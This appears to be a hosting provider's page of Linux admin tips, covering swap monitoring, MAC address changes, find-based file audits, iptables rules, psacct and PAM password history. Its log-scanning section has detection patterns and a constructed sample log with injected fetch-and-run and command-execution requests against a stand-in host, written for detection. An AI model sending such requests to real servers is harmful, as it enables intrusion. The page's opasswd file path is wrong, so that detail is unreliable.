365 Hosting support | Server Management Provider

365hostingsupport ultimate source of Server Security, cPanel server management and monitoring. Since 2012 we are offering top class technical support services at lowest prices. We offer 100% Satisfaction with 7 Days Money Back Guarantee.


How to check swap usage on a per-process basis using “top”


We normally use the free command, or some other commands, to check memory utilization and swap consumption. However, at times it is difficult to find out which process is consuming which part of the swap memory. We can achieve this via the top command.

The plain top command provides a dynamic view of the processes running on the server. With a small tweak it will also display the swap memory consumption on a per-process basis. The following is how you can accomplish this:

After issuing the top command, press the f key, which allows you to add or remove fields (columns) from the top output.

You will then get a list of fields, each selectable by a letter. You will find the following in the list:

p: SWAP       = Swapped size (kb)

All you have to do is press p and then press the enter key. This returns you to the top output with the additional “SWAP” field in it.

The following is how the output from the top command will look:

top - 19:06:29 up 10 day,  6:05,  5 users,  load average: 0.54, 0.30, 0.21
Tasks: 151 total,   1 running, 150 sleeping,   0 stopped,   0 zombie
Cpu(s):  7.2%us,  1.6%sy,  0.0%ni, 91.1%id,  0.0%wa,  0.2%hi,  0.0%si,  0.0%st
Mem:   2062160k total,  1901188k used,   160972k free,   157844k buffers
Swap:  4194296k total,     4840k used,  4189456k free,   864716k cached

PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  SWAP COMMAND
27413 root      20   0  331m 150m  28m S    8  7.5   4:01.31 181m mysqld
5311 root      20   0  560m 163m  12m S    8  8.1  50:36.30 397m Xorg
5835 hradm     20   0 31024  22m 7504 S    1  1.1   8:13.29 7768 python
5881 hradm     20   0 24368  11m 8620 S    1  0.6   0:44.46  11m rcu_bh
5954 hradm     20   0 82824  26m  12m S    1  1.3   0:10.06  54m rcu_bh
24398 hradm     20   0 3068m  47m  23m S    1  2.3   0:29.86 3.0g python
27886 root      20   0  2416 1176  880 R    1  0.1   0:00.16 1240 top
5850 hradm     20   0 75552  26m  14m S    0  1.3   2:36.44  47m rcu_sched
6143 hradm     20   0 46172  23m  11m S    0  1.2   2:21.15  21m xchat
1 root      20   0  3056 1896  576 S    0  0.1   0:01.16 1160 init
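In the sample above the SWAP column is simply VIRT minus RES (331m - 150m = 181m for mysqld) even though the Swap: line shows only 4840k in use, which is how older top versions computed it; the kernel's real per-process figure is the VmSwap line in /proc/PID/status. The following added example (not from the original page) reads that line for every process; the proc root is a parameter so it can be checked against a constructed tree, and the sample PIDs and values are made up.

```shell
# Added example: per-process swap from /proc/PID/status (VmSwap), not from top.
# The proc root is a parameter so the functions can be run against a
# constructed tree; it defaults to the real /proc.
swap_report() {
    proc_root="${1:-/proc}"
    for status in "$proc_root"/[0-9]*/status; do
        [ -r "$status" ] || continue
        pid=$(basename "$(dirname "$status")")
        name=$(awk '/^Name:/ {print $2; exit}' "$status")
        kb=$(awk '/^VmSwap:/ {print $2; exit}' "$status")
        [ -n "$kb" ] || continue      # kernel threads carry no VmSwap line
        [ "$kb" -gt 0 ] || continue   # skip processes with nothing swapped
        printf '%s %s %s\n' "$kb" "$pid" "$name"
    done | sort -rn                   # largest consumer first
}

# Total swapped kB across all processes (should match the "used" figure on
# the Swap: line of top or free)
swap_total_kb() {
    swap_report "$1" | awk '{ s += $1 } END { print s + 0 }'
}

# Constructed sample tree (made-up PIDs and sizes; the values sum to the
# 4840k shown as used on the page's Swap: line)
make_sample_proc() {
    d=$(mktemp -d)
    mkdir -p "$d/27413" "$d/5311" "$d/42"
    printf 'Name:\tmysqld\nVmRSS:\t153600 kB\nVmSwap:\t3120 kB\n' > "$d/27413/status"
    printf 'Name:\tXorg\nVmRSS:\t166912 kB\nVmSwap:\t1720 kB\n' > "$d/5311/status"
    printf 'Name:\tkthreadd\n' > "$d/42/status"
    echo "$d"
}
```

Run swap_report with no argument on a live server to get the real list; the kernel has exposed VmSwap since Linux 2.6.34.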

Changing the MAC address of a NIC on a Linux server


The following are the steps to do it.

Change MAC address for NIC

1. Verify the current configuration of the NIC loaded as eth0 (or whichever interface is on your machine):

[root@hr-root]# ifconfig eth0

eth0      Link encap:Ethernet  HWaddr 00:B0:82:4C:59:7A
inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.xxx  Mask:255.255.248.0
inet6 addr: fc70::2w0:51df:ge45:296g/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:1711272688 errors:0 dropped:0 overruns:0 frame:0
TX packets:1686766955 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:241108923046 (224.5 GiB)  TX bytes:507398519867 (472.5 GiB)
Interrupt:24

Shut down the interface for which the MAC address is to be spoofed:

[root@hr-root]# ifconfig eth0 down

Modify the MAC address for the interface (NIC) using the following command:

[root@hr-root]# ifconfig eth0 hw ether 00:22:44:66:88:99

Bring the network interface back up:

[root@hr-root]# ifconfig eth0 up

The interface eth0 should now be up with the spoofed / changed / modified MAC address.

You can verify it using the ifconfig command:

[root@hr-root]# ifconfig eth0

eth0      Link encap:Ethernet  HWaddr 00:22:44:66:88:99
inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.xxx  Mask:255.255.248.0
inet6 addr: fc70::2w0:51df:ge45:296g/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:1711272873 errors:0 dropped:0 overruns:0 frame:0
TX packets:1686765748 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:241108923046 (224.5 GiB)  TX bytes:507398519867 (472.5 GiB)
Interrupt:24

You can also verify the MAC addresses on your machine using the arp command. The following is the actual command you can use:

[root@hr-root]# arp -a

You can make these changes permanent by adding the above three commands (used to modify the MAC address) to the /etc/rc.local file.

That's it.

How to Find files without any owner or group


For a server security audit you must find the files that aren't owned by any user. In such a case you can use the find command to look for them.

The following command will list the files that aren't owned by any user:

[root@hr-root~]# find / -nouser

Similarly, you can find the files that do not belong to any group:

[root@hr-root]# find / -nogroup

Take for example a user leaving the organization: if we delete the user with the recursive option (userdel -r USERNAME), it deletes the home directory and its contents. However, it won't delete the files owned by that user in other folders.

In that case we can use the following command to identify such files:

[root@hr-root]# find / -nouser -nogroup

So depending on the requirement, we can either delete those files or change their ownership (user & group).

How to check Apache Exploit

Using the following commands we can look for signs of Apache exploit attempts in the access logs on the server:

for i in `locate access_log` ; do echo "$i" ; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$i" ; done

OR

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*

cPanel
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*

Plesk
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*

Search for shell code (NOP-sled bytes appear in the log as \x90):
grep -F '\x90' /path/to/access/logs/*
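The following added example (not from the original page) runs the page's egrep pattern, and a slightly broader variant that also catches a space encoded as + and a parenthesis encoded as %28, over a constructed access_log with documentation-range IPs, and tallies hits per client address.

```shell
# Added example: the page's egrep pattern plus a broader variant, exercised on
# a constructed access_log so the hits can be checked before pointing the
# pattern at real logs.

# Pattern exactly as given on the page
PATTERN='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'
# Broader variant: also catch a space encoded as '+' and '(' encoded as %28
PATTERN_EXT='(chr|system)(\(|%28)|(curl|wget|chmod|gcc|perl)(%20|\+)'

# Print the suspicious request lines from the given log file(s);
# -h drops the filename prefix so the output stays parseable
scan_access_log() {
    grep -Eih "$PATTERN" "$@" 2>/dev/null || true
}
scan_access_log_ext() {
    grep -Eih "$PATTERN_EXT" "$@" 2>/dev/null || true
}

# Count suspicious requests per client IP (first field of the common log format)
suspicious_by_ip() {
    scan_access_log "$@" | awk '{ c[$1]++ } END { for (ip in c) print c[ip], ip }' | sort -rn
}

# Constructed sample log (documentation IP ranges; not real traffic)
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532 "-" "curl/7.19"
203.0.113.7 - - [10/Oct/2012:13:55:40 +0000] "GET /cgi-bin/test.cgi?cmd=wget%20http://198.51.100.9/x HTTP/1.1" 404 300 "-" "-"
198.51.100.22 - - [10/Oct/2012:13:56:01 +0000] "GET /forum/?a=system(%27id%27) HTTP/1.1" 500 220 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2012:13:56:10 +0000] "GET /images/logo.png HTTP/1.1" 200 8231 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:57:02 +0000] "POST /upload.php?x=chmod%20777%20/tmp/a HTTP/1.1" 200 12 "-" "-"
198.51.100.22 - - [10/Oct/2012:13:58:15 +0000] "GET /x.php?c=curl+http://198.51.100.9/s.sh HTTP/1.1" 200 40 "-" "-"
EOF
    echo "$f"
}
```

The page's pattern keys on a literal %20 after the command name, so the first sample line (a legitimate curl user agent) is not reported, while the last line is caught only by the broader variant.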


Find command: how to use it

Search for the string XYZ in all files from the current directory down and list them:

find ./ -name "*" -exec grep -H XYZ {} \;
find ./ -type f -print | xargs grep -H "XYZ" /dev/null
egrep -r XYZ *

Find all files of a given type from the current directory down:

find ./ -name "*.conf" -print

Find all user files larger than 5 MB:

find /home -size +5000000c -print

Find all files owned by a user (given by numeric user id) on the system (could take a long time):

find / -user 501 -print

Find all files created or updated in the last five minutes (great for finding the effects of make install):

find / -cmin -5

Find all world-writable directories:

find / -perm -0002 -type d -print

Find all world-writable files:

find / -perm -0002 -type f -print

find / -perm -2 ! -type l -ls

Find files with no user or no group (the parentheses make -print apply to both conditions):

find / \( -nouser -o -nogroup \) -print

Find files modified or changed within the last two days:

find / -mtime -2 -o -ctime -2

Find files in a directory that are older than 3 days and delete them:

find /directoryname -type f -mtime +3 -exec rm {} \;

SYN Attack and DOS Attack Protection

Please add the following rules to your iptables configuration.
#Protect from SYN Attack
-A INPUT -p tcp --tcp-flags ALL NONE -j DROP
-A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
-A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
-A INPUT -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
-A INPUT -p tcp --tcp-flags ACK,FIN FIN -j DROP
-A INPUT -p tcp --tcp-flags ACK,PSH PSH -j DROP
-A INPUT -p tcp --tcp-flags ACK,URG URG -j DROP
-A INPUT -i eth0 -p tcp -m state --state NEW -m tcp --sport 1024:65535 --dport 20 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --sport 1024:65535 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
-A OUTPUT -o eth0 -p tcp -m tcp --sport 1024:65535 --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -m state --state NEW -p tcp -m multiport --dport http,https -o eth0 -m limit --limit 120/min --limit-burst 15 -j ACCEPT


How to trace Command History for all users


psacct is an important utility which can be used to track the command history of all users on a live system. The actual command to display it is lastcomm.

This utility (psacct) is present on all RHEL servers but is disabled at startup. You need to start psacct via its init.d script or enable it with chkconfig.

[root@hr-root~]# lastcomm

The above command will display the command history of all users.

The output of lastcomm in particular can be very useful when investigating the command history.

For each entry in the lastcomm output, the following information is printed:
+ command name of the process
+ flags, as recorded by the system accounting routines:
S — command executed by super-user
F — command executed after a fork but without a following exec
C — command run in PDP-11 compatibility mode (VAX only)
D — command terminated with the generation of a core file
X — command was terminated with the signal SIGTERM
+ the name of the user who ran the process
+ time the process exited

The psacct package contains several utilities for monitoring process activities, including ac, lastcomm, accton, and sa.

* ac – displays statistics about how long users have been logged on.
* lastcomm – displays information about previously executed commands.
* accton – turns process accounting on or off.
* sa – summarizes information about previously executed commands.

Pluggable Authentication Module: How to restrict use of previous password

PAM (Pluggable Authentication Module) in Linux can take care of this. PAM handles the basic authentication and account management on a Linux server. PAM can also maintain a list of old passwords for each user, so when a user changes his/her password, the module checks it against the list of previous passwords and forces the user to select a different one.

So the following is the file that needs to be modified on a RHEL/CentOS/Fedora box:

[root@hr-root ~]# vim /etc/pam.d/system-auth

Locate the following line:

password sufficient pam_unix.so use_authtok md5 shadow

Make the line look like something below:

password sufficient pam_unix.so use_authtok md5 shadow remember=5

Save and close the file.

The server will now remember the last 5 passwords for all users and won't allow a user to change to a password that is one of those last 5.

The old passwords are stored in /etc/pam.d/opasswd.

Disable files with unwanted SUID & SGID

An SUID/SGID enabled file can be dangerous when the system is shared by multiple users. It is always better to run a routine audit for such files.

You can use the following small find commands to find all files with SUID or SGID enabled (-perm -4000 tests for the bit; the older -perm +4000 form is no longer accepted by current GNU find):

Find all files on the server with SUID permission:

[root@hr-root ~]# find / -perm -4000

Find all files on the server with SGID permission:

[root@hr-root ~]# find / -perm -2000

Find all files on the server with SUID and/or SGID permission at the same time:

[root@hr-root ~]# find / \( -perm -4000 -o -perm -2000 \) -print
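The following added example (not from the original page) packages the permission checks from this section and from the find section above into functions that audit a given directory, and builds a constructed tree of files to exercise them. The owner/group check is included for completeness but only reports anything on a tree with stale uids, which needs root to create and is not simulated here.

```shell
# Added example: the find(1) audits from the page as functions over a given
# directory, with a constructed tree to exercise them. -perm -mode (all of
# the given bits set) is used because it is portable; GNU find also accepts
# -perm /mode (any bit set) but no longer accepts the old -perm +mode.

# Regular files with the setuid (4000) or setgid (2000) bit
find_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# World-writable files and directories; symlinks are skipped because their
# mode is always 777 and says nothing about the target
find_world_writable() {
    find "$1" ! -type l -perm -0002 -print
}

# Files whose uid or gid no longer maps to a user or group
find_unowned() {
    find "$1" \( -nouser -o -nogroup \) -print
}

# Constructed tree (file names are made up; the modes are what the audit
# is looking for)
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/tmp" "$d/etc"
    : > "$d/bin/suid_tool";  chmod 4755 "$d/bin/suid_tool"   # setuid
    : > "$d/bin/sgid_tool";  chmod 2755 "$d/bin/sgid_tool"   # setgid
    : > "$d/etc/motd";       chmod 0644 "$d/etc/motd"        # clean
    : > "$d/tmp/scratch";    chmod 0666 "$d/tmp/scratch"     # world-writable file
    chmod 1777 "$d/tmp"                                      # world-writable dir
    ln -s "$d/etc/motd" "$d/tmp/link"                        # symlink, not reported
    echo "$d"
}
```

Point the functions at / (as root) for a real audit; on the constructed tree they report the two set-id files and the two world-writable entries and nothing unowned.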